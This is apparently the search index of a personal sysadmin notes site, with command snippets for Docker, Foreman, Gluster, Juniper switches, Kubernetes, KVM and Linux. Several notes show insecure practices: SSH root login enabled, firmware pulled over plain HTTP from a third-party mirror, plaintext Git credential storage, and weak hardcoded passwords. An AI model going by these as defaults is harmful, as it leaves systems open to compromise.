    docker volume create couchpotato-config\n\ndocker run \\\n    --name=couchpotato \\\n    -v couchpotato-config:/config \\\n    -v /storage/torrents_download:/downloads \\\n    -v /storage/media/movies:/movies \\\n    -e TZ=America/Toronto \\\n    -e PGID=113 -e PUID=109  \\\n    -p 5050:5050 \\\n    -d \\\n    linuxserver/couchpotato\n
    "},{"location":"docker/#watch-docker-stats","title":"Watch docker stats","text":"
    watch 'docker stats --no-stream --format \"table {{.Container}}\\t{{.Name}}\\t{{.CPUPerc}}\\t{{.MemUsage}}\"'\n
    "},{"location":"elasticsearch/","title":"Elasticsearch","text":""},{"location":"elasticsearch/#clean-indexes-old-than-x-days","title":"Clean indexes old than X days","text":"
    #! /bin/bash\n#Script to cleanup the logstash indices.\nDELETE_INDICES=$(/usr/bin/curl --silent -XGET 'localhost:9200/_cat/indices' | /bin/egrep -o logstash-20[0-9][0-9]\\.[0-9][0-9]\\.[0-9][0-9] | /bin/egrep -v \"$filter\" | /usr/bin/tr '\\n' ',')\nif [ $DELETE_INDICES ]\nthen\n/usr/bin/curl -XDELETE \"localhost:9200/$DELETE_INDICES\"\nfi\n
    "},{"location":"foreman/","title":"Foreman","text":""},{"location":"foreman/#remove-old-kernel-boot-files-sometimes-necessary-when-the-deployment-fails-with-a-kernel-not-foundmismatch-error","title":"Remove old kernel boot files (sometimes necessary when the deployment fails with a Kernel not found/mismatch error)","text":"
    ldumont@foreman:/srv/tftp/boot$ ls -alh\ntotal 189M\ndrwxr-xr-x 2 foreman-proxy root          4.0K Mar  9 12:53 .\ndrwxr-xr-x 8 root          nogroup       4.0K Dec 16  2018 ..\n-rw-r--r-- 1 foreman-proxy foreman-proxy  53M Sep  6  2019 centos-mirror-qVbSBrznIWMc-initrd.img\n-rw-r--r-- 1 foreman-proxy foreman-proxy 6.5M Aug  7  2019 centos-mirror-qVbSBrznIWMc-vmlinuz\n-rw-r--r-- 1 foreman-proxy foreman-proxy  30M Feb  1 09:55 debian-mirror-wXTzvPQ8AfC3-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 5.1M Feb  1 09:55 debian-mirror-wXTzvPQ8AfC3-linux\n-rw-r--r-- 1 foreman-proxy foreman-proxy  36M Apr 20  2016 ubuntu-16.04-16.04.5-x86_64-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 6.7M Apr 20  2016 ubuntu-16.04-16.04.5-x86_64-linux\n-rw-r--r-- 1 foreman-proxy foreman-proxy  45M Apr 25  2018 ubuntu-mirror-WKCIULkETfqj-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 7.9M Apr 25  2018 ubuntu-mirror-WKCIULkETfqj-linux\n\n# Remove the all files related to a single OS.\nsudo rm -f debian-mirror*\n
    "},{"location":"foreman/#update-foreman","title":"Update Foreman","text":"
    #https://theforeman.org/manuals/1.22/index.html#3.6Upgrade\n\nsystemctl apache2 stop\n# Upgrade .list file from /etc/apt/sources.list.d/foreman.list\napt-get update\napt-get --only-upgrade install ruby\\* foreman\\*\nforeman-rake db:migrate\nforeman-rake db:seed\nforeman-rake tmp:cache:clear\nforeman-rake db:sessions:clear\n\n# Test Foreman upgrade\nforeman-installer --noop --dont-save-answers --verbose\n# Start Foreman installer upgrade.\nforeman-installer\nservice apache2 restart\n
    "},{"location":"foreman/#fix-failing-gem-packages","title":"Fix failing GEM packages.","text":"
    # As root\nsu foreman\n# cd to home\ncd\nmv Gemfile.lock Gemfile.lock.backup\n/usr/bin/foreman-ruby /usr/bin/bundle update\n/usr/bin/foreman-ruby /usr/bin/bundle install\n
    "},{"location":"foreman/#remove-plugin","title":"Remove plugin","text":"
    # Remove the gem file for your plugin.\n# rm ~foreman/bundler.d/Gemfile.local.rb\n# ~Gemfile.local.rb\n\n# Reinstall all gems without the old one\n/usr/bin/foreman-ruby /usr/bin/bundle install\n\n# Restart Foreman\ntouch ~foreman/tmp/restart.txt\n
    "},{"location":"frr/","title":"FRR","text":""},{"location":"frr/#enter-frr-shell","title":"Enter FRR shell","text":"
    sudo vtyshell\n
    "},{"location":"frr/#show-bgp-neigbors","title":"Show bgp neigbors","text":"
    show bgp neighbors\nshow bgp summary\n
    "},{"location":"frr/#show-information-from-neighbors","title":"Show information from neighbors","text":"
    show bgp vrf all ipv4 neighbors x.x.x.x advertised-routes\nshow bgp vrf all ipv4 neighbors x.x.x.x received-routes \n
    "},{"location":"frr/#frr-pfsense","title":"FRR pfsense","text":"
    show bgp ipv4 unicast neighbors 170.39.196.221 advertised-routes\nshow bgp summary\n
    "},{"location":"git/","title":"Git","text":""},{"location":"git/#git-stuff","title":"Git Stuff","text":""},{"location":"git/#easy-gitsh","title":"easy-git.sh","text":"
    #!/bin/bash\nDIRECTORY=.git\nif [ -z \"$1\" ]; then\n    echo \"You savage, you need a comment for a commit!\"\n    exit\nfi\n\nif [ -d \"$DIRECTORY\" ]; then\n    git add .\n    git commit -S -m \"$1\"\n    git push origin master\nelse\n    echo \"This is NOT a git repo\"\nfi\n
    "},{"location":"git/#credentials","title":"Credentials","text":"
    git config --global credential.helper store\ngit config --global credential.helper 'cache --timeout=3600' \n
    "},{"location":"gluster/","title":"Gluster","text":""},{"location":"gluster/#troubleshooting","title":"Troubleshooting","text":"
    gluster volume info\n
    sudo gluster peer probe kube2\n
    sudo gluster peer status\n
    gluster volume status all clients\n
    sudo gluster volume create gluster-vol-1 replica 2 transport tcp kube1:/gluster/gluster-vol-1 kube2:/gluster/gluster-vol-1\n
    "},{"location":"gluster/#no-replicate-single-server","title":"No replicate - single server.","text":"
    gluster volume create $VOLUME_NAME $IPADDRESS_OR_DOMAINNAME:/$ROOT_MOUNT_POINT/$SUBFOLDER\ngluster volume start $VOLUME_NAME\n
    "},{"location":"gluster/#mount-a-gluster-share","title":"Mount a gluster share.","text":"
    mount -t glusterfs $GLUSTER_SERVER_IP:$SHARE_NAME $LOCAL_PATH\n
    sudo gluster volume start gluster-vol-1\n
    "},{"location":"gluster/#enable-nfs-on-a-gluster-non-ganesha-volume","title":"Enable nfs on a gluster (non-ganesha) volume","text":"
    gluster volume set media nfs\ngluster volume set media nfs.disable off\ngluster volume set openstack-storage nfs.disable off\n
    "},{"location":"gluster/#disable-ctime-for-rancher-to-be-able-to-mount-gluster-volumes","title":"Disable ctime for Rancher to be able to mount Gluster volumes.","text":"
    root@gluster01:~# history | grep ctime\n  481  gluster volume set kube_vol ctime off\n  498  gluster volume set kube_vol ctime on\n  499  gluster volume set kube_vol ctime off\n  501  history | grep ctime\n
    "},{"location":"iperf/","title":"iPerf","text":"

    UDP TEST (DDOS like test where you send traffic to the other endpoint without any policing. iPerf3 does not allow you to send traffic directly for UDP. It needs to \"connect\" to an iPerf3 endpoint, even for UDP.

    ./iperf -c TARGET_IP --udp --interval 2 --bandwidth 9m\n

    IPERF SERVER TCP

    ./iperf --server\n

    IPERF CLIENT TCP UPLOAD AND THEN DOWNLOAD

    ./iperf --client IPERF_SERVER --tradeoff --window 1M\n

    IPERF CLIENT TCP UPLOAD AND DOWNLOAD AT THE SAME TIME

    ./iperf --client IPERF_SERVER --dualtest --window 1M\n
    "},{"location":"iperf/#iperf-systemd-file","title":"Iperf Systemd file","text":"
    [ec2-user@perf-server ~]$ sudo cat /etc/systemd/system/iperf3.service \n# /etc/systemd/system/iperf.service\n[Unit]\nDescription=iperf server\nAfter=syslog.target network.target auditd.service\n\n[Service]\nExecStart=/usr/bin/iperf3 --log /var/log/iperf/iperf-server.log --server\n\n[Install]\nWantedBy=multi-user.target\n
    "},{"location":"iscsi/","title":"ISCSI","text":""},{"location":"iscsi/#discover-login-targets","title":"Discover login targets","text":"
    iscsiadm --mode discoverydb -t sendtargets --portal $ISCSI_SERVER_IP --discover -d 7\n
    "},{"location":"iscsi/#show-iscsi-stats","title":"Show iscsi stats","text":"
    sudo iscsiadm --mode session --stats\n
    "},{"location":"juniper/","title":"Juniper","text":""},{"location":"juniper/#useful-commands","title":"Useful commands.","text":"
    # Show the current configuration.\nshow configuration\n\n#Show the logs of the device.\nshow log messsage\n\n#Show but compare\nshow | compare\n\n#Show but display as a line configuration and not XML.\nshow | display set\n\n#Show interface list and status\nshow interfaces terse\n\n#Show current hardware\nshow chassis hardware\n\n#Show global routing table\nshow route\n\nshow interface | incl (proto|Desc)\n\n#Show processus using memory and general system performance stats\nshow system processes summary\n\n#Check CPU usage\nshow chassis routing-engine\nshow system process extensive | no-more\n
    "},{"location":"juniper/#delete-interface-config","title":"Delete interface config","text":"
    delete interface ge-0/0/4\ndelete interface ge-0/0/5\ndelete interface ge-0/0/7\ndelete interface ae6\n
    "},{"location":"juniper/#syslog-configuration","title":"Syslog configuration.","text":"
    set system syslog user * any emergency\nset system syslog host 10.0.99.28 any any\nset system syslog host 10.0.99.28 port 1514\nset system syslog file messages any notice\nset system syslog file messages authorization info\nset system syslog file interactive-commands interactive-commands any\n
    "},{"location":"juniper/#radius-configuration","title":"Radius configuration.","text":"
    edit\nset system radius-server $RADIUS_SERVER_IP_HERE source-address $SWITCH_IP_HERE\nset system radius-server $RADIUS_SERVER_IP_HERE secret $PASSWORD_HERE\n\nset system authentication-order [ radius password ]\n\n#Create user profiles based on FreeIPA group.\n\nedit system login\nset user HELPDESK class read-only\nset user OPERATOR class super-user\nset user remote full-name \"default remote access user template\"\nset user remote class read-only\n
    "},{"location":"juniper/#create-a-vlan","title":"Create a vlan","text":"
    set vlans OSTACK-TEST-1 vlan-id 70\n
    "},{"location":"juniper/#create-a-l3-vlan-interface","title":"Create a L3 VLAN interface.","text":"
    set vlans MGMT vlan-id 69\nset interfaces ge-0/0/23 unit 0 family ethernet-switching port-mode trunk 666 vlan members 69\nset interfaces vlan unit 69 family inet address 10.10.69.14/24\nset vlans MGMT l3-interface vlan.69\n
    "},{"location":"juniper/#enable-ssh-with-root-login","title":"Enable SSH with root login.","text":"
    set system services ssh root-login allow\n
    "},{"location":"juniper/#create-a-default-route","title":"Create a default route.","text":"
    set routing-options static route 0.0.0.0/0 next-hop 10.10.69.1\n
    "},{"location":"juniper/#add-a-nameserver-for-dns-resolution","title":"Add a nameserver for DNS resolution.","text":"
    edit system name-server 8.8.8.8 \n
    "},{"location":"juniper/#upgrade-the-junos-image","title":"Upgrade the JunOS image.","text":"
    request system software add http://web.weba.ru/pub/500G_3/Firmware/Juniper/12.3/domestic/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz\n\nfile copy http://web.weba.ru/pub/500G_3/Firmware/Juniper/12.3/domestic/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz  /var/tmp/\n\nrequest system software add /var/tmp/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz reboot\n
    "},{"location":"juniper/#repair-a-junos-partition-that-rebooted-from-the-backup-partition","title":"Repair a JunOS partition that rebooted from the backup partition.","text":"
    ***********************************************************************\n**                                                                   **\n**  WARNING: THIS DEVICE HAS BOOTED FROM THE BACKUP JUNOS IMAGE      **\n**                                                                   **\n**  It is possible that the primary copy of JUNOS failed to boot up  **\n**  properly, and so this device has booted from the backup copy.    **\n**                                                                   **\n**  Please re-install JUNOS to recover the primary copy in case      **\n**  it has been corrupted and if auto-snapshot feature is not        **\n**  enabled.                                                         **\n**                                                                   **\n***********************************************************************\n
    show chassis alarms\nshow system storage partitions\nrequest system snapshot media internal slice alternate\nshow system snapshot media internal\nrequest system reboot slice alternate media internal\n
    "},{"location":"juniper/#create-an-admin-user","title":"Create an admin user.","text":"
    set system login user cmaker authentication plain-text-password\nset system login user cmaker class super-user\n
    "},{"location":"juniper/#add-a-ssh-key-to-a-local-user-for-password-less-auth","title":"Add a SSH key to a local user for password-less auth.","text":"
    set system login user prox-exporter-juniper authentication ssh-rsa \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJZTRPs8WXsD1yNmWd69/zHNDf4ApvTXDjfk0rxEjgiDsOgWvID0Q8ZH0tFzSV9L0W7a/9jG0POuJyiGYF6M4X2QdEPSZ2CgxRm7GL4A1SJ4xbnCYny2k4L8C7UrDrvqThv6/FyyJopHCPp7S3j0iAI6c+Gtv59sbUvdilWC4Y5LX0ho+yocMaGvTOk+l5aQRU9eWmZsD0/3D0V99iBnm70rlEeEIr1Oe+M+y/Q/0vmBVdC75COCxu84PnLvqPH2yOf3j581wgIVncKbApB0b9ApTbCE94jNljtwM4uGM9qICOf0BwbrDfFT1L1n5ZQx7BZnD9410wv2jTYXTPUJV1\"\nset system login user prox-exporter-juniper class super-user\n
    "},{"location":"juniper/#password-recovery","title":"Password recovery.","text":"
    Boot normally.\n\nPrompt : Hit [Enter] to boot immediately, or space bar for command prompt.\n\npress space during the boot process\n\nType :\nloader> boot -s\n\nType : \nEnter full pathname of shell or 'recovery' for root password recovery or RETURN for /bin/sh: recovery\n
    "},{"location":"juniper/#configure-snmp-with-contact-and-location-strings","title":"Configure SNMP with contact and location strings.","text":"
    set snmp name \u201ccmaker-ex2200\u201d description \u201ccmaker-ex2200\u201d\nset snmp location \u201c9880 Clark\u201d\nset snmp contact \"laurentfdumont@gmail.com\"\nset snmp community cmaker authorization read-only\n
    "},{"location":"juniper/#aggregated-interfaces-ae","title":"Aggregated interfaces (AE)","text":"
    #Increase the number of AE interfaces.\nset chassis aggregated-devicesethernetdevice-count4 \n\n\n#Create the AE interface and the switching options.\nset interfaces ae3 description AE-LACP-ULTRABACON-PROXMOX\nset interfaces ae3 aggregated-ether-options lacp active\nset interfaces ae3 unit 0 family ethernet-switching port-mode trunk\nset interfaces ae3 unit 0 family ethernet-switching vlan members 69\nset interfaces ae3 unit 0 family ethernet-switching vlan members 99-100\nset interfaces ae3 unit 0 family ethernet-switching vlan members 210\nset interfaces ae3 unit 0 family ethernet-switching vlan members 2001\nset interfaces ae3 unit 0 family ethernet-switching native-vlan-id 666\n\ncmaker@ex2200-cmaker> show configuration interfaces ge-0/0/17 | display set \nset interfaces ge-0/0/17 description LACP-ULTRABACON-PROXMOX\nset interfaces ge-0/0/17 ether-options 802.3ad ae3\n
    "},{"location":"kolla/","title":"Kolla","text":""},{"location":"kolla/#deploying-kolla","title":"Deploying Kolla","text":"
    kolla-ansible -i ./multinode bootstrap-servers\nkolla-ansible -i ./multinode prechecks\nkolla-ansible -i ./multinode deploy\n
    "},{"location":"kubernetes/","title":"Kubernetes","text":""},{"location":"kubernetes/#pod-configuration","title":"Pod configuration","text":""},{"location":"kubernetes/#get-pods-running-on-specific-node","title":"Get pods running on specific node","text":"
    #Get the node names\nkubectl get nodes                                                                                                                                                                                                                                                                         Tue 14 Apr 2020\nNAME          STATUS   ROLES                      AGE    VERSION\n10.10.99.58   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.59   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.60   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.61   Ready    controlplane,etcd,worker   138d   v1.16.3\n\n#Get all the pods on that node\nkubectl get pods --all-namespaces -o wide --field-selector spec.nodeName=10.10.99.58\n\nkubectl get pods --all-namespaces -o wide --field-selector spec.nodeName=10.10.99.58                                                                                                                                                                                              353ms \ue0b3 Tue 14 Apr 2020\nNAMESPACE              NAME                                                       READY   STATUS      RESTARTS   AGE    IP            NODE          NOMINATED NODE   READINESS GATES\ncattle-prometheus      exporter-node-cluster-monitoring-8zzvj                     1/1     Running     2          36d    10.10.99.58   10.10.99.58   <none>           <none>\ncattle-prometheus      prometheus-operator-monitoring-operator-7985c7f758-9rgf6   1/1     Running     3          36d    10.42.2.112   10.10.99.58   <none>           <none>\ncattle-system          cattle-node-agent-6fprv                                    1/1     Running     5          137d   10.10.99.58   10.10.99.58   <none>           <none>\ncattle-system          rancher-c88c6458c-ggnww                                    1/1     Running     22         138d   10.42.2.103   10.10.99.58   <none>           <none>\ncert-manager           
cert-manager-584cbff946-mcds8                              1/1     Running     13         138d   10.42.2.107   10.10.99.58   <none>           <none>\ncert-manager           cert-manager-cainjector-7c556d76f-s48js                    1/1     Running     37         115d   10.42.2.111   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-migrations.1-gwfl9                                  0/1     Completed   0          36d    10.42.2.82    10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-minio-67df89d968-lpg9b                              1/1     Running     2          36d    10.42.2.116   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-nginx-ingress-controller-5655b8bf66-mtvdl           1/1     Running     2          36d    10.42.2.109   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-nginx-ingress-default-backend-677f7b7778-7dj7q      1/1     Running     2          36d    10.42.2.110   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-registry-647ddd89c-qrdhj                            1/1     Running     2          36d    10.42.2.115   10.10.99.58   <none>           <none>\nfoldingathome          fah-workers-3                                              1/1     Running     0          9d     10.42.2.125   10.10.99.58   <none>           <none>\ningress-nginx          default-http-backend-67cf578fc4-6ffns                      1/1     Running     4          138d   10.42.2.104   10.10.99.58   <none>           <none>\ningress-nginx          nginx-ingress-controller-tdfv8                             1/1     Running     4          138d   10.10.99.58   10.10.99.58   <none>           <none>\nistio-system           istio-pilot-56866b7c5f-5pfj4                               2/2     Running     6          73d    10.42.2.106   10.10.99.58   <none>           <none>\nistio-system           istio-sidecar-injector-8565bfc879-85p4n                    1/1     Running     4          73d    
10.42.2.102   10.10.99.58   <none>           <none>\nistio-system           istio-tracing-79fbf487df-g6xml                             2/2     Running     7          73d    10.42.2.108   10.10.99.58   <none>           <none>\nkube-system            canal-85lqk                                                2/2     Running     8          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            coredns-5c59fd465f-k6ks7                                   1/1     Running     4          138d   10.42.2.105   10.10.99.58   <none>           <none>\nkube-system            rke-coredns-addon-deploy-job-p97pl                         0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-ingress-controller-deploy-job-r2bcz                    0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-metrics-addon-deploy-job-r2dmg                         0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-network-plugin-deploy-job-ghlhz                        0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nmetallb-system         controller-65895b47d4-stk74                                1/1     Running     2          35d    10.42.2.113   10.10.99.58   <none>           <none>\nmetallb-system         speaker-pnc7d                                              1/1     Running     2          35d    10.10.99.58   10.10.99.58   <none>           <none>\n
    "},{"location":"kubernetes/#config-map","title":"Config-map","text":"
    kubectl create configmap ara-config --namespace cmaker-lab-namespace --from-file=config-maps/settings.yaml   \nkubectl get configmap --namespace cmaker-lab-namespace\n
    "},{"location":"kubernetes/#create-helm-charts","title":"Create helm charts","text":"
    helm install ara-postgres --namespace cmaker-lab-namespace  ./postgresql/ --values postgresql/values.yaml\nhelm install ara-ansible --namespace cmaker-lab-namespace  ./helm-ansible-ara/ --values helm-ansible-ara/values.yaml\n
    "},{"location":"kubernetes/#delete-helm-charts","title":"Delete helm charts","text":"
    helm delete ara-ansible --namespace cmaker-lab-namespace\nhelm delete ara-postgres --namespace cmaker-lab-namespace\n
    "},{"location":"kubernetes/#debugging","title":"Debugging","text":""},{"location":"kubernetes/#delete-pv","title":"Delete PV","text":"
    ldumont@docker01:~$ kubectl delete pv test --grace-period=0 --force^C\nldumont@docker01:~$ kubectl patch pv test -p '{\"metadata\": {\"finalizers\": null}}'\n
    "},{"location":"kubernetes/#storage","title":"Storage","text":""},{"location":"kubernetes/#create-gluster-endpoint","title":"Create Gluster Endpoint.","text":"

    gluster-endpoints.yaml

    ---\nkind: Endpoints\napiVersion: v1\nmetadata:\n name: glusterfs-cluster\nsubsets:\n- addresses:\n - ip: 9.111.249.161\n ports:\n - port: 666\n

    gluster-service.yaml

    apiVersion: v1\nkind: Service\nmetadata:\n  name: glusterfs-cluster\nspec:\n  ports:\n  - port: 666\n
    "},{"location":"kvm/","title":"KVM","text":""},{"location":"kvm/#customize-qcow2-images","title":"Customize qcow2 images","text":"

    Download the .img first

    virt-customize --install ethtool,traceroute,iputils-ping,socat,dnsutils,tcpdump,tshark,iperf,iperf3,mtr,fping,lldpd --root-password password:potato123 -a 22.04-server.img\n

    Sysprep is necessary to remove any static information from a VM (hostname, ssh host keys, interfaces MAC/config). Similar to Windows sysprep.

    In this case, we do not remove the ssh-hostkeys because of possible issues with ssh access if the keys are not re-generated.

    virt-sysprep --operations defaults,-ssh-hostkeys -a 22.04-server.img\n
    "},{"location":"kvm/#using-uvtools-for-ubuntu-minimal-images","title":"Using uvtools for Ubuntu minimal images","text":"

    Download the images

    uvt-kvm  uvt-simplestreams-libvirt sync --source https://cloud-images.ubuntu.com/minimal/daily/ release=bionic arch=amd64\n
    uvt-kvm create --packages iperf,iperf3,dnsutils,tcpdump,--disk 5 --password potato123 --memory 2048 --cpu 2 myminimalvm-jammy release=jammy arch=amd64 \"label=minimal daily\"\n

    Download images are in /var/lib/uvtool/libvirt/images/

    "},{"location":"kvm/#get-list-of-os-variants-valid-for-kvm","title":"Get list of os-variants valid for KVM","text":"
    ldumont@kvm01:~$ osinfo-query os | grep -i centos\ncentos6.0            | CentOS 6.0                                         | 6.0      | http://centos.org/centos/6.0            \ncentos6.1            | CentOS 6.1                                         | 6.1      | http://centos.org/centos/6.1            \ncentos6.10           | CentOS 6.10                                        | 6.10     | http://centos.org/centos/6.10           \ncentos6.2            | CentOS 6.2                                         | 6.2      | http://centos.org/centos/6.2            \ncentos6.3            | CentOS 6.3                                         | 6.3      | http://centos.org/centos/6.3            \ncentos6.4            | CentOS 6.4                                         | 6.4      | http://centos.org/centos/6.4            \ncentos6.5            | CentOS 6.5                                         | 6.5      | http://centos.org/centos/6.5            \ncentos6.6            | CentOS 6.6                                         | 6.6      | http://centos.org/centos/6.6            \ncentos6.7            | CentOS 6.7                                         | 6.7      | http://centos.org/centos/6.7            \ncentos6.8            | CentOS 6.8                                         | 6.8      | http://centos.org/centos/6.8            \ncentos6.9            | CentOS 6.9                                         | 6.9      | http://centos.org/centos/6.9            \ncentos7.0            | CentOS 7.0                                         | 7.0      | http://centos.org/centos/7.0          \n
    "},{"location":"kvm/#create-pxe-only-virsh-domain","title":"Create PXE only virsh domain","text":"
    sudo virt-install --name test-ubuntu \\\n--ram 4096 --vcpus 2 \\\n--disk path=/var/lib/libvirt/images/test-ubuntu,bus=virtio,size=50 \\\n--noautoconsole --graphics vnc \\\n--cdrom=/var/lib/libvirt/boot/mini.iso \\\n--network bridge:br0 \\\n--network bridge:br1 \\\n--os-variant ubuntu18.04\n\nsudo virt-install --name ooo-director \\\n--ram 18432 --vcpus 8 \\\n--disk path=/var/lib/libvirt/images/ooo-director,bus=virtio,size=50 \\\n--noautoconsole --graphics vnc \\\n--cdrom=/var/lib/libvirt/boot/CentOS-7-x86_64-Minimal-1908.iso \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller001 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller001.qcow2,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller002 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller002.qcow2,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller003 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller003.qcow2,bus=virtio,size=50 \\  \n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-compute001 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-compute001,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n
    "},{"location":"kvm/#bridge-physical-interface-for-vm-access","title":"Bridge physical interface for VM access.","text":"
    #Install the bridge-utils package\napt-get install bridge-utils\n\n#Create the two bridges\nbrctl addbr br1\nbrctl addbr br2\n
    # In /etc/network/interfaces\n# Use old eth0 config for br0, plus bridge stuff\n\n#loopback\nauto lo\niface lo inet loopback\n\nauto br0\nauto br1\n\niface br0 inet static\n    address 10.10.99.62\n    gateway 10.10.99.1\n    netmask 255.255.255.0\n    dns-nameservers 10.10.99.1 \n    dns-search cmaker.studio\n    bridge_ports    ens18\n    bridge_stp      off\n    bridge_maxwait  0\n    bridge_fd       0\n\niface br1 inet manual\n    bridge_ports    ens19\n    bridge_stp      off\n    bridge_maxwait  0\n    bridge_fd       0\n
    "},{"location":"kvm/#show-vnc-information-port-is-590vncdisplay_index","title":"Show VNC information - port is 590$(VNCDISPLAY_INDEX)","text":"
    root@kvm01:~# virsh vncdisplay ooo-controller001\n:0\n\nroot@kvm01:~# virsh vncdisplay ooo-controller002\n:1\n\nroot@kvm01:~# virsh vncdisplay ooo-controller003\n:2\n\nroot@kvm01:~# netstat -punta | grep 590\ntcp        0      0 0.0.0.0:5902            0.0.0.0:*               LISTEN      2691/qemu-system-x8 \ntcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      2559/qemu-system-x8 \ntcp        0      0 0.0.0.0:5901            0.0.0.0:*               LISTEN      2649/qemu-system-x8 \n
    "},{"location":"kvm/#vbmc","title":"VBMC","text":""},{"location":"kvm/#installation","title":"Installation","text":"
    yum install gcc python-devel\npip install --upgrade setuptools\npip install virtualbmc\n
    vbmc add ooo-controller001 --port 16001 --username test --password secret\nvbmc add ooo-controller002 --port 16002 --username test --password secret\nvbmc add ooo-controller003 --port 16003 --username test --password secret\nvbmc add ooo-compute001 --port 16004 --username test --password secret\n\nvbmc start ooo-controller001\nvbmc start ooo-controller002\nvbmc start ooo-controller003\nvbmc start ooo-compute001\n
    "},{"location":"kvm/#enable-serial-connection-over-virsh","title":"Enable serial connection over virsh","text":"
    #FROM THE GUEST VM\nsudo systemctl enable serial-getty@ttyS0.service\nsudo systemctl start serial-getty@ttyS0.service\n
    #FROM THE KVM HOST\nsudo virsh console $DOMAIN_NAME\n#OR GET THE DOMAIN ID from `virsh list`\nsudo virsh console $KVM_DOMAIN_ID\n
    "},{"location":"linux/","title":"Generic Linux","text":"

    Rancid - Check which devices are impacted

    sort var/logs/VPN.20180109.070410  | grep -i key | uniq\n

    Rancid - Only show the device name to pipe into ssh-keygen

    sort var/logs/VPN.20180109.070410  | grep -i key | uniq | grep -Eo '^[^ ]+'\n
    sort /opt/rancid/var/logs/VPN.20180111.064300  | grep -i key | uniq | grep -Eo '^[^ ]+'\n

    SSH - Remove the public keys

    ssh-keygen -f \"/opt/rancid/.ssh/known_hosts\" -R ###REMOTE_IP_OF_DEVICE###\n

    BIND DNS - Check the master zones (not ARPA or random files ) we are hosting

    ls -alh --ignore=*.arpa* | wc -\n

    SMART HD Data - Get useful smartctl data

    sudo smartctl -a /dev/sdb | egrep \"Spin_Up_Time|Reallocated_Sector_Ct|Temperature|Current_Pending_Sector|Offline_Uncorrectable|Power_On_Hours\"\n

    Network - Create TAP Interface

    tunctl -t tap0\nifconfig tap0 10.1.1.100 netmask 255.255.255.0 up\n

    Start Linux stress test

    screen -S stress-test -d -m stress --cpu 100 --io 100 --vm 20 --vm-bytes 1G --hdd 5 --timeout 24h\n

    Install markdown-pdf

    sudo npm install -g phantomjs --unsafe-perm\nsudo npm install -g markdown-pdf --unsafe-perm\n

    Debug Radius, FreeIPA, LDAP

    radiusd -X 2>&1 | tee debugfile\n\ntail -f /var/log/dirsrv/slapd-EVENT-DHMTL-CA/access\n\nradtest ldumont user_ldap_password 10.0.99.22 1812 shared_radius_secret\n\nldapwhoami -vvv -h 10.0.99.22 -p 389 -D uid=ldumont,cn=users,cn=accounts,dc=event,dc=dhmtl,dc=ca -x -w user_ldap_password\n
    "},{"location":"linux/#when-windows-10-creator-upgrade-breaks-linux-grub","title":"When Windows 10 Creator upgrade breaks Linux Grub","text":"
    set root=(hd0,msdos5)\nset prefix=(hd0,msdos5)/boot/grub\ninsmod normal\nnormal\n

    When in the OS - to make the changes permanent.

    sudo update-grub\nsudo grub-install disk\n
    "},{"location":"linux/#upgrading-to-debian-testing-breaks-apt-when-trying-to-downgrade","title":"Upgrading to Debian testing breaks APT when trying to downgrade.","text":"

    Replace \"Ubuntu\" with \"Debian\" if you are running Debian /etc/apt/preferences.d/allow-downgrade

    Package: *\nPin: release a=stable\nPin-Priority: 1001\n
    apt-get update\napt-get upgrade\n

    Remove the file after and

    apt-get update\n

    If you are missing gnome and the display doesn't work

    sudo apt-get update\nsudo apt-get upgrade\nsudo apt-get dist-upgrade\nsudo apt-get install nvidia-driver\nsudo shutdown -r now\n

    Should be good to go!

    "},{"location":"linux/#unbalanced-audio-with-pulse-audio","title":"Unbalanced audio with Pulse audio","text":"
    killall pulseaudio; rm -r ~/.config/pulse/* ; rm -r ~/.pulse*\npulseaudio -k \n

    Reboot!

    "},{"location":"linux/#create-gpg-key-and-export-the-key-format-for-signing-github-commits","title":"Create GPG key and export the key format for signing Github commits","text":"
    #Create the key\ngpg --gen-key\n\n#Show the key ID\ngpg --list-keys\n\n#Set the global Git sign key\ngit config --global user.signingkey $KEY_ID_HERE\n\n#Set the GPG sign flag to true for all repos.\ngit config --global commit.gpgsign true\n\n#Export the key with \"-----BEGIN PGP PUBLIC KEY BLOCK-----\"\ngpg --armor --export laurentfdumont@gmail.com > mykey.asc\n
